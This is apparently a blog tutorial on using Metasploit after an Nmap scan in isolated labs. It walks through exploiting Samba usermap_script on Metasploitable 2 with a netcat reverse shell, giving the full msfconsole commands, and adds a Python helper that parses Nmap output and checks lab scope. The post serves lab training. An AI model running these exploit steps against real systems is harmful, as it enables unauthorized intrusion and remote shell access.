Preamble

Metasploit bundles auxiliary modules, exploits, payloads, and post tooling. It is powerful enough that “I was learning” is not a legal defense on someone else’s network. I use it only in isolated VMs with snapshots, on ranges I own or have explicit written authorization to test—same ethics frame as sqlmap and Nmap.


Workflow after Nmap

  1. Import or hand-enter Nmap findings (services, versions).
  2. Start with auxiliary scanners that verify behavior without exploiting.
  3. Move to exploits only when the lab is designed for that outcome and the legal box is checked.

Document each module, its options, and the outcome as you would in a lab notebook—future you writes the reports; present you stays honest.


Worked example: Samba usermap and a reverse shell

The following is a textbook lab pattern only: a deliberately vulnerable image such as Metasploitable 2 (or another range you own) with SMB ports open, paired with an attacker VM on the same isolated network. Module paths and payloads can differ slightly by Metasploit release; use search and info when in doubt.

1. Confirm the service (after your Nmap pass). You are looking for Samba/smbd on something like TCP 139 and 445, with a version string that matches known lab images—not proof of exploitability by itself, but it tells you which search terms to try.

2. Start the console.

$ msfconsole -q

3. Find and select the exploit.

msf6 > search type:exploit samba usermap
msf6 > use exploit/multi/samba/usermap_script

4. Point the exploit at the target and choose a reverse payload. A reverse shell has the target connect out to your machine, which is often easier in NAT’d lab topologies than a bind shell. Set LHOST to an address the target can route to (your attacker VM’s interface on the lab LAN, not 127.0.0.1).

msf6 exploit(...)> show options
msf6 exploit(...)> set RHOSTS 192.168.56.101
msf6 exploit(...)> set LHOST 192.168.56.1
msf6 exploit(...)> set LPORT 4444
msf6 exploit(...)> set payload cmd/unix/reverse_netcat
msf6 exploit(...)> exploit

5. Read the result. Success is usually an interactive shell (or a session you can interact with via Metasploit’s job/session commands, depending on version). If the handler never receives a connection, typical lab fixes are: wrong LHOST, host firewall on the attacker, or the target not actually vulnerable to this module (wrong box or patched image).

6. Lab hygiene. When you are done, revert the snapshot or reprovision the victim VM. Treat any credential or data touched in the lab as throwaway.

Pattern for other exploits: use a module → show options / show payloads → set RHOSTS (and any service-specific options) → for reverse shells, set payload, LHOST, and LPORT → exploit or run. For staged payloads or hand-generated binaries, you typically start a listener with use exploit/multi/handler, configured with the same payload, LHOST, and LPORT, then deliver the artifact through your authorized test path.
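
Two of the steps above, importing Nmap findings (workflow step 1) and diagnosing a handler that never gets a connection (step 5), are easy to script. The following is an added example written for this page, not code from Metasploit or from the original post; the Nmap XML is a constructed sample, and the 192.168.56.0/24 lab network is an assumption to adjust for your own range.

```python
import ipaddress
import xml.etree.ElementTree as ET

# Constructed sample of Nmap -sV XML output (not a real scan), cut down to the fields used.
SAMPLE_NMAP_XML = """<nmaprun><host><address addr="192.168.56.101" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="22"><state state="open"/>
  <service name="ssh" product="OpenSSH" version="4.7p1"/></port>
<port protocol="tcp" portid="139"><state state="open"/>
  <service name="netbios-ssn" product="Samba smbd" version="3.X - 4.X"/></port>
<port protocol="tcp" portid="445"><state state="open"/>
  <service name="netbios-ssn" product="Samba smbd" version="3.0.20-Debian"/></port>
<port protocol="tcp" portid="80"><state state="closed"/><service name="http"/></port>
</ports></host></nmaprun>"""


def open_services(xml_text):
    """Return one (host, port, name, product, version) tuple per open TCP port."""
    rows = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            if port.get("protocol") != "tcp" or state is None or state.get("state") != "open":
                continue  # closed/filtered ports are noted by Nmap but give us nothing to search on
            svc = port.find("service")
            get = (lambda k: svc.get(k, "")) if svc is not None else (lambda k: "")
            rows.append((addr, int(port.get("portid")), get("name"), get("product"), get("version")))
    return rows


def notebook_lines(rows):
    """One lab-notebook line per open service; product and version are the msf search terms."""
    return [f"{h}:{p} {n} {prod} {ver}".rstrip() for h, p, n, prod, ver in rows]


def lab_handler_check(rhost, lhost, lab_net="192.168.56.0/24"):
    """Flag the settings that leave a reverse-shell handler waiting forever (step 5)."""
    # lab_net is an assumed isolated host-only network; change it to match your range.
    net = ipaddress.ip_network(lab_net)
    r, l = ipaddress.ip_address(rhost), ipaddress.ip_address(lhost)
    problems = []
    if l.is_loopback:
        problems.append("LHOST is loopback; the target cannot connect back to 127.0.0.1")
    elif l not in net:
        problems.append(f"LHOST {lhost} is not on the lab network {lab_net}")
    if r not in net:
        problems.append(f"RHOSTS {rhost} is outside the lab network {lab_net}; re-check scope")
    return problems
```

Run `notebook_lines(open_services(open("scan.xml").read()))` against a real `nmap -sV -oX scan.xml` of your own range to get the lines to paste into your notes, and call `lab_handler_check(RHOSTS, LHOST)` before typing exploit.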


Engineering parallel: isolation discipline

Destructive integration tests and exploit labs share one virtue: environment isolation. Snapshots, disposable networks, and seeded data prevent “oops” from becoming career events. That mindset transfers directly to CI hygiene for database migrations and chaos experiments.


Conclusion

Metasploit teaches the system interactions that attackers automate. Defenders learn from it why patch velocity, least privilege, and segmentation matter. A First Go CLI: Tooling and Modules then switches tone to Go CLIs for everyday ops utilities.